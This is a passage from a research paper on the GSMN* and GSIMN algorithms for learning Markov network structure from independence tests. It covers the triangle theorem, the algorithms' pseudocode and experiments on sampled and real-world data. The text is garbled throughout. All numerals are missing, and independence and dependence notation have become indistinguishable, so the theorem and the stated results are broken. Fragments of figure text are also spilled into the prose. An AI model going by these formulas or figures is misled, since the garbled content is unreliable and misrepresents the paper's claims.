rendered them conditionally independent of x in a previous step, and independence can therefore be inferred easily. note that in the experiments section of the paper (section ) we evaluate gsmn∗ with and without the propagation phase, in order to measure the effect that this propagation optimization has on performance. turning off propagation is accomplished simply by setting sets t and f (as computed in lines and , respectively) to the empty set. another difference of gsmn∗ from the abstract gsmn algorithm is in the use of condi- tion pxy ≤ α (line ). this is an additional optimization that avoids an independence test in the case that x and y were found (unconditionally) independent during the initialization phase, since in that case this would imply x and y are independent given any conditioning set by the axiom of strong union. a crucial difference between gsmn∗ and the abstract gsmn algorithm is that gsmn∗ changes the examination order π and the grow order λy of every variable y ∈ λx . (since x /∈ λx , this excludes the grow order of x itself.) these changes in ordering proceed as follows: after the end of the grow phase of variable x, the new examination order π (set in lines – ) dictates that the next variable w to be examined after x is the last to be added to s during the growing phase that has not yet been examined (i.e., w is still in π). the grow order λy of all variables y found dependent with x is also changed; this is done to maximize the number of optimizations by the gsimn algorithm (our main contribution in this paper) which shares the algorithm structure of gsmn∗. the changes in grow order are therefore explained in detail in section . when gsimn is presented. a final difference between gsmn∗ and the abstract gsmn algorithm is the restart actions of the grow and shrink phases of gsmn whenever the current markov blanket is modified (lines and of algorithm ), which are not present in gsmn∗. the restarting efficient markov network structure discovery using independence tests figure : illustration of the operation of gsmn∗ using an independence graph. the figure shows the growing phase of variable . variables are examined according to its grow order λ = [ , , , , , , ]. of the loops was necessary in the gs algorithm due to its original usage in learning the structure of bayesian networks. in that task, it was possible for a true member y of the blanket of x to be found initially independent during the grow loop when conditioning on some set s but to be found dependent later when conditioned on a superset s′ ⊃ s. this could happen if y was an “unshielded spouse” of x i.e., if y had one or more common children with x but there existed no direct link between y and x in the underlying bayesian network. however, this behavior is impossible in a domain that has a distribution faithful to a markov network (one of our assumptions): any independence between x and y given s must hold for any superset s′ of s by the axiom of strong union (see eqs. ( )). the restart of the grow and shrink loops is therefore omitted from gsmn∗ in order to save unnecessary tests. note that, even though it is possible that this behavior is impossible in faithful domains, it is possible in unfaithful ones, so we also experimentally evaluated our algorithms in real-world domains in which the assumption of markov faithfulness may not necessarily hold (section ). a proof of correctness of gsmn∗ is presented in appendix a. . independence graphs we can demonstrate the operation of gsmn∗ graphically by the concept of the independence graph, which we now introduce. we define an independence graph to be an undirected graph in which conditional independences and dependencies between single variables are represented by one or more annotated edges between them. a solid (dotted) edge between variables x and y annotated by z represents the fact that x and y have been found dependent (independent) given z. if the conditioning set z is enclosed in parentheses then this edge represents an independence or dependence that was inferred from eqs. ( ) (as opposed to computed from statistical tests). shown graphically: bromberg, margaritis, & honavar x y z (x ⊥⊥y | z) x y z (x⊥⊥y | z) x y (z) (x ⊥⊥y | z) (inferred) x y (z) (x⊥⊥y | z) (inferred) for instance, in figure , the dotted edge between and annotated with “ , ” represents the fact that ( ⊥⊥ | { , }). the absence of an edge between two variables indicates the absence of information about the independence or dependence between these variables under any conditioning set. example . figure illustrates the operation of gsmn∗ using an independence graph in the domain whose underlying markov network is shown in figure . the figure shows the independence graph at the end of the grow phase of the variable , the first in the examination order π. (we do not discuss in this example the initialization phase of gsmn∗; instead, we assume that the examination (π) and grow (λ) orders are as shown in the figure.) according to vertex separation on the underlying network (figure ), variables , , , and are found dependent with during the growing phase i.e., ¬i( , | ∅), ¬i( , | { }), ¬i( , | { , }), ¬i( , | { , , }) and are therefore connected to in the independence graph by solid edges annotated by sets ∅, { }, { , } and { , , } respectively. variables , , and are found independent i.e., i( , | { , }), i( , | { , , }), i( , | { , , , }) and are thus connected to by dotted edges annotated by { , }, { , , } and { , , , } respectively. . the triangle theorem in this section we present and prove a theorem that is used in the subsequent gsimn algorithm. as will be seen, the main idea behind the gsimn algorithm is to attempt to de- crease the number of tests done by exploiting the properties of the conditional independence relation in faithful domains i.e., eqs. ( ). these properties can be seen as inference rules that can be used to derive new independences from ones that we know to be true. a careful study of these axioms suggests that only two simple inference rules, stated in the triangle theorem below, are sufficient for inferring most of the useful independence information that can be inferred by a systematic application of the inference rules. this is confirmed in our experiments in section . efficient markov network structure discovery using independence tests figure : independence graph depicting the triangle theorem. edges in the graph are labeled by sets and represent conditional independences or dependencies. a solid (dotted) edge between x and y labeled by z means that x and y are dependent (independent) given z. a set label enclosed in parentheses means the edge was inferred by the theorem. theorem (triangle theorem). given eqs. ( ), for every variable x, y , w and sets z and z such that {x, y, w}∩ z = {x, y, w}∩ z = ∅, (x ⊥⊥w | z ) ∧ (w ⊥⊥y | z ) =⇒ (x ⊥⊥y | z ∩ z ) (x⊥⊥w | z ) ∧ (w ⊥⊥y | z ∪ z ) =⇒ (x⊥⊥y | z ). we call the first relation the “d-triangle rule” and the second the “i-triangle rule.” proof. we are using the strong union and transitivity of eqs. ( ) as shown or in contra- positive form. (proof of d-triangle rule): • from strong union and (x ⊥⊥w | z ) we get (x ⊥⊥w | z ∩ z ). • from strong union and (w ⊥⊥y | z ) we get (w ⊥⊥y | z ∩ z ). • from transitivity, (x ⊥⊥w | z ∩z ), and (w ⊥⊥y | z ∩z ), we get (x ⊥⊥y | z ∩z ). (proof of i-triangle rule): • from strong union and (w ⊥⊥y | z ∪ z ) we get (w ⊥⊥y | z ). • from transitivity, (x⊥⊥w | z ) and (w ⊥⊥y | z ) we get (x⊥⊥y | z ). we can represent the triangle theorem graphically using the independence graph con- struct of section . . figure depicts the two rules of the triangle theorem using two independence graphs. the triangle theorem can be used to infer additional conditional independences from tests conducted during the operation of gsmn∗. an example of this is shown in fig- ure , which illustrates the application of the triangle theorem to the example presented in figure . the independence information inferred from the triangle theorem is shown by curved edges (note that the conditioning set of each such edge is enclosed in parentheses). bromberg, margaritis, & honavar figure : illustration of the use of the triangle theorem on the example of figure . the set of variables enclosed in parentheses correspond to tests inferred by the triangle theorem using the two adjacent edges as antecedents. for example, the result ( ⊥⊥ | { , }), is inferred from the i-triangle rule, independence ( ⊥⊥ | { , }) and dependence ( ⊥⊥ | { , , }). for example, independence edge ( , ) can be inferred by the d-triangle rule from the ad- jacent edges ( , ) and ( , ), annotated by { } and { , , } respectively. the annotation for this inferred edge is { }, which is the intersection of the annotations { } and { , , }. an example application of the i-triangle rule is edge ( , ), which is inferred from edges ( , ) and ( , ) with annotations { , } and { , , } respectively. the annotation for this inferred edge is { , }, which is the intersection of the annotations { , , } and { , }. . the gsimn algorithm in the previous section we saw the possibility of using the two rules of the triangle theorem to infer the result of novel tests during the grow phase. the gsimn algorithm (grow-shrink inference-based markov network learning algorithm), introduced in this sec- tion, uses the triangle theorem in a similar fashion to extend gsmn∗ by inferring the value of a number of tests that gsmn∗ executes, making their evaluation unnecessary. gsimn and gsmn∗ work in exactly the same way (and thus the gsimn algorithm shares exactly the same algorithmic description i.e., both follow algorithm ), with all differences between them concentrated in the independence procedure they use: instead of using independence procedure igsmn∗ of gsmn ∗, gsimn uses procedure igsimn, shown in algorithm . pro- cedure igsimn, in addition to attempting to propagate the blanket information obtained from the examination of previous variables (as igsmn∗ does), also attempts to infer the value of the independence test that is provided as its input by either the strong union axiom (listed in eqs. ( )) or the triangle theorem. if this attempt is successful, igsimn returns the value inferred (true or false), otherwise it defaults to a statistical test on the data set (as igsmn∗ does). for the purpose of assisting in the inference process, gsimn and efficient markov network structure discovery using independence tests algorithm igsimn(x, y, s, f, t): calculate independence test result by inference (in- cluding propagation), if possible. record test result in the knowledge base. : /* attempt to infer dependence by propagation. */ : if y ∈ t then : return false : /* attempt to infer independence by propagation. */ : if y ∈ f then : return true : /* attempt to infer dependence by strong union. */ : if ∃(a, false) ∈ kxy such that a ⊇ s then : return false : /* attempt to infer dependence by the d-triangle rule. */ : for all w ∈ s do : if ∃(a, false) ∈ kxw such that a ⊇ s ∧ ∃(b, false) ∈ kw y such that b ⊇ s then : add (a ∩ b, false) to kxy and ky x . : return false : /* attempt to infer independence by strong union. */ : if ∃(a, true) ∈ kxy such that a ⊆ s then : return true : /* attempt to infer independence by the i-triangle rule. */ : for all w ∈ s do : if ∃(a, true) ∈ kxw s.t. a ⊆ s ∧ ∃(b, false) ∈ kw y s.t. b ⊇ a then : add (a, true) to kxy and ky x . : return true : /* else do statistical test on data. */ : t ← (p(x,y |z)>α) /* t = true iff p-value of statistical test (x, y | s) > α. */ : add (s, t) to kxy and ky x . : return t igsimn maintain a knowledge base kxy for each pair of variables x and y , containing the outcomes of all tests evaluated so far between x and y (either from data or inferred). each of these knowledge bases is empty at the beginning of the gsimn algorithm (the initializa- tion step is not shown in the algorithm since gsmn∗ does not use it), and is maintained within the test procedure igsimn. we now explain igsimn (algorithm ) in detail. igsimn attempts to infer the in- dependence value of its input triplet (x, y | s) by applying a single step of backward chaining using the strong union and triangle rules i.e., it searches the knowledge base k = {kxy : x, y ∈ v} for antecedents of instances of rules that have the input triplet (x, y | s) as consequent. the strong union rule is used in its direct from as shown in eqs. ( ) and also in its contrapositive form. the direct form can be used to infer indepen- dences, and therefore we refer to it as the i-su rule from here on. in its contrapositive form, the i-su rule becomes (x ⊥⊥y | s ∪ w) =⇒ (x ⊥⊥y | s), referred to as the d-su rule since it can be used to infer dependencies. according to the d-triangle and d-su rules, the dependence (x ⊥⊥y | s) can be inferred if the knowledge base k contains . a test (x ⊥⊥y | a) with a ⊇ s, or . tests (x ⊥⊥w | a) and (w ⊥⊥y | b) for some variable w , with a ⊇ s and b ⊇ s, bromberg, margaritis, & honavar figure : illustration of the operation of gsimn. the figure shows the grow phase of two consecutively examined variables and . the figure shows how the variable examined second is not but , according to the change in the examination order π in lines – of algorithm . the set of variables enclosed in parentheses correspond to tests inferred by the triangle theorem using two adjacent edges as antecedents. the results ( ⊥⊥ | ∅), ( ⊥⊥ | { }), ( ⊥⊥ | { , }), and ( ⊥⊥ | { , , }) in (b), shown highlighted, were not executed but inferred from the tests done in (a). respectively. according to the i-triangle and i-su rules, the independence (x⊥⊥y | s) can be inferred if the knowledge base contains . a test (x⊥⊥y | a) with a ⊆ s, or . tests (x⊥⊥w | a) and (w ⊥⊥y | b) for some variable w , with a ⊆ s and b ⊇ a, respectively. the changes to the grow orders of some variables occur inside the grow phase of the currently examined variable x (lines – of gsimn i.e., algorithm with igsmn∗ re- placed by igsimn.). in particular, if, for some variable y , the algorithm reaches line , i.e., pxy ≤ α and igsimn(x, y, s) = false, then x and all the variables that were found dependent with x before y (i.e., all variables currently in s) are promoted to the beginning of the grow order λy . this is illustrated in figure for variable , which depicts the grow phase of two consecutively examined variables and . in this figure, the curved edges show the tests that are inferred by igsimn during the grow phase of variable . the grow order of changes from λ = [ , , , , , , ] to λ = [ , , , , , , ] after the grow phase of variable is complete because the variables , , and were promoted (in that order) to the beginning of the queue. the rationale for this is the observation that this increases the number of tests inferred by gsimn at the next step: the change in the examination and grow orders described above was chosen so that the inferred tests while learning the blanket of variable match exactly those required by the algorithm in some future step. in efficient markov network structure discovery using independence tests particular, note that in the example the set of inferred dependencies between each variable found dependent with before are exactly those required during initial part of the grow phase of variable , shown highlighted in figure (b) (the first four dependencies). these independence tests were inferred (not conducted), resulting in computational savings. in general, the last dependent variable of the grow phase of x has the maximum number of dependences and independences inferred and this provides the rationale for its change in grow order and its selection by the algorithm to be examined next. it can be shown that under the same assumptions as gsmn∗, the structure returned by gsimn is the correct one i.e., each set bx computed by the gsimn algorithm equals exactly the neighbors of x. the proof of correctness of gsimn is based on correctness of gsmn∗ and is presented in appendix b. . gsimn technical implementation details in this section we discuss a number of practical issues that subtly influence the accuracy and efficiency of an implementation of gsimn. one is the order of application of the i-su, d-su, i-triangle and d-triangle rules within the function igsimn. given an independence-query oracle, the order of application should not matter—assuming there are more than one rules for inferring the value of an independence, all of them are guaranteed to produce the same value due to the soundness of the axioms of eqs. ( ) (pearl, ). in practice however, the oracle is implemented by statistical tests conducted on data which can be incorrect, as previously mentioned. of particular importance is the observation that false independences are more likely to occur than false dependencies. one example of this is the case where the domain dependencies are weak—in this case any pair of variables connected (dependent) in the underlying true network structure may be incorrectly deemed independent if all paths between them are long enough. on the other hand, false dependencies are much more rare— the confidence threshold of −α = . of a statistical test tells us that the probability of a false dependence by chance alone is only %. assuming i.i.d. data for each test, the chance of multiple false dependencies is even lower, decreasing exponentially fast. this practical observation i.e., that dependencies are typically more reliable than independences, provide the rationale for the way the igsimn algorithm works. in particular, igsimn prioritizes the application of rules whose antecedents contain dependencies first i.e., the d-triangle and d-su rules, followed by the i-triangle and i-su rules. in effect, this uses statistical results that are typically known with greater confidence before ones that are usually less reliable. the second practical issue concerns efficient inference. the gsimn algorithm uses a one- step inference procedure (shown in algorithm ) that utilizes a knowledge base k = {kxy } containing known independences and dependences for each pair of variables x and y . to implement this inference efficiently we utilize a data structure for k for the purpose of storing and retrieving independence facts in constant time. it consists of two d arrays, one for dependencies and another for independencies. each array is of n × n size, where n is the number of variables in the domain. each cell in this array corresponds to a pair of variables (x, y ), and stores the known independences (dependences) between x and y in the form of a list of conditioning sets. for each conditioning set z in the list, the knowledge base kxy represents a known independence (x⊥⊥y | z) (dependence (x ⊥⊥y | z)). it is important to note that the length of each list is at most , as there are no more than two bromberg, margaritis, & honavar tests done between any variable x and y during the execution of gsimn (done during the growing and shrinking phases). thus, it always takes a constant time to retrieve/store an independence (dependence), and therefore all inferences using the knowledge base are constant time as well. also note that all uses of the strong union axion by the igsimn algorithm are constant time as well, as they can be accomplished by testing the (at most two) sets stored in kxy for subset or superset inclusion. . experimental results we evaluated the gsmn∗ and gsimn algorithms on both artificial and real-world data sets. through the experimental results presented below we show that the simple application of pearl’s inference rules in gsimn algorithm results in a significant reduction in the number of tests performed when compared to gsmn∗ without adversely affecting the quality of the output network. in particular we report the following quantities: • weighted number of tests. the weighted number of tests is computed by the summation of the weight of each test executed, where the weight of test (x, y | z) is defined as +|z|. this quantity reflects the time complexity of the algorithm (gsmn∗ or gsimn) and can be used to assess the benefit in gsimn of using inference instead of executing statistical tests on data. this is the standard method of comparison of independence-based algorithms and it is justified by the observation that the running time of a statistical test on triplet (x, y | z) is proportional to the size n of the data set and the number of variables involved in it i.e., o(n (|z|+ )) (and is not exponential in the number of variables involved as a näıve implementation might assume). this is because one can construct all non-zero entries in the contingency table used by the test by examining each data point in the data set exactly once, in time proportional to the number of variables involved in the test i.e., proportional to |{x, y }∪z| = +|z|. • execution time. in order to assess the impact of inference in the running time (in addition to the impact of statistical tests), we report the execution time of the algorithm. • quality of the resulting network. we measure quality in two ways. – normalized hamming distance. the hamming distance between the output network and the structure of the underlying model is another measure of the quality of the output network, when the actual network that was used to generate the data is known. the hamming distance is defined as the number of “reversed” edges between these two network structures, i.e., the number of times an actual edge in the true network is missing in the returned network or an edge absent from the true network exists in the algorithm’s output network. a value zero means that the output network has the correct structure. to be able to compare domains of different dimensionalities (number of variables n) we normalize it by ( n ) , the total number of node pairs in the corresponding domain. – accuracy. for real-world data sets where the underlying network is unknown, no hamming distance calculation is possible. in this case it is impossible to know the true value of any independence. we therefore approximate it by a statistical test on the entire data set, and use a limited, randomly chosen subset ( / of the data set) to learn the network. to measure accuracy we compare the result efficient markov network structure discovery using independence tests (true or false) of a number of conditional independence tests on the network output (using vertex separation), to the same tests performed on the full data set. in all experiments involving data sets we used the χ statistical test for estimation of conditional independences. as mentioned above, rules of thumb exist that deem certain tests as potentially unreliable depending on the counts of the contingency table involved; for example, one such rule cochran ( ) deems a test unreliable if more than % of the cells of the contingency table have less than data points the test. due to the requirement that an answer must be obtained by an independence algorithm conducting a test, we used the outcomes of such tests as well in our experiments. the effect of these possibly unreliable tests on the quality of the resulting network is measured by our accuracy measures, listed above. in the next section we present results for domains in which the underlying probabilistic model is known. this is followed by real-world data experiments where no model structure is available. . known-model experiments in the first set of experiments the underlying model, called the true model or true network, is a known markov network. the purpose of this set of experiments is to conduct a controlled evaluation of the quality of the output network through a systematic study of the algorithms’ behavior under varying conditions of domain size (number of variables) and amount of dependencies (average node degree in the network). each true network that contains n variables was generated randomly as follows: the network was initialized with n nodes and no edges. a user-specified parameter of the network structure is the average node degree τ that equals the average number of neighbors per node. given τ , for every node its set of neighbors was determined randomly and uniformly by selecting the first τ n pairs in a random permutation of all possible pairs. the factor / is necessary because each edge contributes to the degree of two nodes. we conducted two types of experiments using known network structure: exact learning experiments and sample-based experiments. . . exact learning experiments in this set of known-model experiments, we assume that the result of all statistical queries asked by the gsmn∗ and gsimn algorithms were available, which assumes the existence of an oracle that can answer independence queries. when the underlying model is known, this oracle can be implemented through vertex separation. the benefits of querying the true network for independence are two: first, it ensures faithfulness and correctness of the independence query results, which allows the evaluation of the algorithms under their assumptions for correctness. second, these tests can be performed much faster than actual statistical tests on data. this allowed us to evaluate our algorithms in large networks—we were able to conduct experiments of domains containing up to variables. we first report the weighted number of tests executed by gsmn∗ with and without propagation and gsimn. our results are summarized in figure , which shows the ratio between the weighted number of tests of gsimn and the two versions of gsmn∗. one bromberg, margaritis, & honavar . . . . . . . . . w c (g s im n ) / w c (g s m n * w ith p ro p a g a tio n ) domain size (number of variables) ratio of weighted cost of gsimn vs. gsmn* without propagation τ = τ = τ = τ = . . . . . . . . . w c (g s im n ) / w c (g s m n * w ith o u t p ro p a g a tio n ) domain size (number of variables) ratio of weighted cost of gsimn vs. gsmn* with propagation τ = τ = τ = τ = figure : ratio of the weighted number of tests of gsimn over gsmn∗ without propaga- tion (left plot) and with propagation (right plot) for network sizes (number of nodes) up to n = of average degree τ = , , , and . algorithm ifch(x, y, s, f, t). forward-chaining implementation of independence test igsimn(x, y, s, f, t). : /* query knowledge base. */ : if ∃(s, t) ∈ kxy then : return t : t ← result of test (x, y | s) /* t = true iff test (x, y | s) returns independence. */ : add (s, t) to kxy and ky x . : run forward-chaining inference algorithm on k, update k. : return t hundred true networks were generated randomly for each pair (n, τ ), and the figure shows the mean value. we can see that the limiting reduction (as n grows large) in weighted number of tests depends primarily on the average degree parameter τ . the reduction of gsimn for large n and dense networks (τ = ) is approximately % compared to gsmn∗ with propagation and % compared to gsmn∗ without the propagation optimization, demonstrating the benefit of gsimn vs. gsmn∗ in terms of number of tests executed. one reasonable question about the performance of gsimn is to what extent its inference procedure is complete i.e., from all those tests that gsimn needs during its operation, how does the number of tests that it infers (by applying a single step of backward chaining on the strong union axiom and the triangle theorem, rather than executing a statistical test on data) compare to the number of tests that can be inferred (for example using a complete automated theorem prover on eqs. ( ))? to measure this, we compared the number of tests done by gsimn with the number done by an alternative algorithm, which we call gsimn- fch (gsimn with forward chaining). gsimn-fch differs from gsimn in function ifch, shown in algorithm , which replaces function igsimn of gsimn. ifch exhaustively produces all independence statements that can be inferred through the properties of eqs. ( ) using a forward-chaining procedure. this process iteratively builds a knowledge base k containing the truth value of conditional independence predicates. whenever the outcome of a test is required, k is queried (line of ifch in algorithm ). if the value of the test is efficient markov network structure discovery using independence tests . . . . . . ratio of number of tests gsimn-fch and gsimn r a tio number of variables (n) τ = τ = τ = τ = figure : ratio of number of tests of gsimn-fch over gsimn for network sizes (number of variables) n = to n = and average degrees τ = , , , and . found in k, it is returned (line ). if not, gsimn-fch performs the test and uses the result in a standard forward-chaining automatic theorem prover subroutine (line ) to produce all independence statements that can be inferred by the test result and k, adding these new facts to k. a comparison of the number of tests executed by gsimn vs. gsimn-fch is presented in figure , which shows the ratio of the number of tests of gsimn over gsimn-fch. the figure shows the mean value over four runs, each corresponding to a network generated randomly for each pair (n, τ ), for τ = , , and and n up to . unfortunately, after two days of execution gsimn-fch was unable to complete execution on domains containing variables or more. we therefore present results for domain sizes up to only. the figure shows that for n ≥ , and every τ the ratio is exactly i.e., all tests inferable were produced by the use of the triangle theorem in gsimn. for smaller domains, the ratio is above . with the exception of a single case, (n = , τ = ). . . sample-based experiments in this set of experiments we evaluate gsmn∗ (with and without propagation) and gsimn on data sampled from the true model. this allows a more realistic assessment of the performance of our algorithms. the data were sampled from the true (known) markov network using gibbs sampling. in the exact learning experiments of the previous section only the structure of the true network was required, generated randomly in the fashion described above. to sample data from a known structure however, one also needs to specify the network parameters. for each random network, the parameters determine the strength of dependencies among connected variables in the graph. following agresti ( ), we used the log-odds ratio as a measure of the strength of the probabilistic influence between two binary variables x and y , defined as θxy = log pr(x = , y = ) pr(x = , y = ) pr(x = , y = ) pr(x = , y = ) . bromberg, margaritis, & honavar . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn figure : normalized hamming distances between the true network and the network output by gsmn∗ (with and without propagation) and gsimn for domain size n = and average degrees τ = , , , . the network parameters were generated randomly so that the log-odds ratio between every pair of variables connected by an edge in the graph has a specified value. in this set of experiments, we used values of θ = , θ = . and θ = for every such pair of variables in the network. figures and show plots of the normalized hamming distance between the true network and that output by the gsmn∗ (with and without propagation) and gsimn for domain sizes of n = and n = variables, respectively. these plots show that the hamming distance of gsimn is comparable to the ones of the gsmn∗ algorithms for both efficient markov network structure discovery using independence tests . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for sampled data n = , τ = , θ = . gsmn* without propagation gsmn* with propagation gsimn figure : normalized hamming distance results as in figure but for domain size n = . domain sizes n = and n = , all average degrees τ = , , , and log-odds ratios θ = , θ = . and θ = . this reinforces the claim that inference done by gsimn has a small impact on the quality of the output networks. figure shows the weighted number of tests of gsimn vs. gsmn∗ (with and without propagation) for a sampled data set of , points for domains n = , and n = , average degree parameters τ = , , , and and log-odds ratios θ = , . and . gsimn shows a reduced weighted number of tests with respect to gsmn∗ without propagation in all cases and compared to gsmn∗ with propagation in most cases (with the only exceptions of (τ = , θ = ) and (τ = , θ = . )). for sparse networks and weak dependences i.e., τ = , this reduction is larger than % for both domain sizes, a reduction much larger bromberg, margaritis, & honavar w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn w e ig h te d n u m b e r o f te st s number of variables weighted cost for sampled data τ = , θ = . , , data points gsmn* without propagation gsmn* with propagation gsimn figure : weighted number of tests executed by gsmn∗ (with and without propagation) and gsimn for |d| = , , for domains sizes n = and , average degree parameters τ = , , , and , and log-odds ratios θ = , , , and . than the one observed for the exact learning experiments. the actual execution times for various data set sizes and network densities are shown in figure for the largest domain of n = , and θ = , verifying the reduction in cost of gsimn for various data set sizes. note that the reduction is proportional to the number of data points; this is reasonable as each test executed must go over the entire data set once to construct the contingency table. this confirms our claim that the cost of inference of gsimn is small (constant time per test, see discussion in section . ) compared to the execution time of the tests themselves, and indicates increasing cost benefits of the use of gsimn for even large data sets. efficient markov network structure discovery using independence tests e xe cu tio n t im e ( se c) execution times for sampled data sets n = variables, τ = , θ = gsmn* without propagation gsmn* with propagation gsimn e xe cu tio n t im e ( se c) execution times for sampled data sets n = variables, τ = , θ = gsmn* without propagation gsmn* with propagation gsimn e xe cu tio n t im e ( se c) execution times for sampled data sets n = variables, τ = , θ = gsmn* without propagation gsmn* with propagation gsimn e xe cu tio n t im e ( se c) execution times for sampled data sets n = variables, τ = , θ = gsmn* without propagation gsmn* with propagation gsimn figure : execution times for sampled data experiments for θ = , τ = , (top row) and τ = , (bottom row) for a domain of n = variables. . . real-world network sampled data experiments we also conducted sampled data experiments on well-known real-world networks. as there is no known repository of markov networks drawn from real-world domains, we instead utilized well-known bayesian networks that are widely used in bayesian network research and are available from a number of repositories. to generate markov networks from these bayesian network structures we used the process of moralization (lauritzen, ) that consists of two steps: (a) connect each pair of nodes in the bayesian network that have a common child with an undirected edge and (b) remove directions of all edges. this results in a markov network in which the local markov property is valid i.e., each node is conditionally independent of all other nodes in the domain given its direct neighbors. during this procedure some conditional independences may be lost. this, however, does not affect the accuracy results because we compare the independencies of the output network with those of the moralized markov network (as opposed to the bayesian network). we conducted experiments using real-world domains: hailfinder, insurance, alarm, mildew, and water. for each domain we sampled a varying number of data points from its corresponding bayesian network using logic sampling (henrion, ), and used it as input to the gsmn∗ (with and without propagation) and gsimn algorithms. we then compared the network output from each of these algorithms to the original moralized network using the normalized hamming distance metric previously described. the results are shown in . we used http://compbio.cs.huji.ac.il/repository/. accessed on december , . bromberg, margaritis, & honavar . . . . . . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for hailfinder data set gsmn* without propagation gsmn* with propagation gsimn . . . . . . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for insurance data set gsmn* without propagation gsmn* with propagation gsimn . . . . . . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for alarm data set gsmn* without propagation gsmn* with propagation gsimn . . . . . . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for mildew data set gsmn* without propagation gsmn* with propagation gsimn . . . . . . . . . n o rm a liz e d h a m m in g d is ta n ce data set size (thousands of data points) hamming distance for water data set gsmn* without propagation gsmn* with propagation gsimn figure : normalized hamming distance of the network output by gsmn∗ (with and without propagation) and gsimn with the true markov networks network using varying data set sizes sampled from markov networks for various real-world domains modeled by bayesian networks. fig. and indicate that the distances produced from the 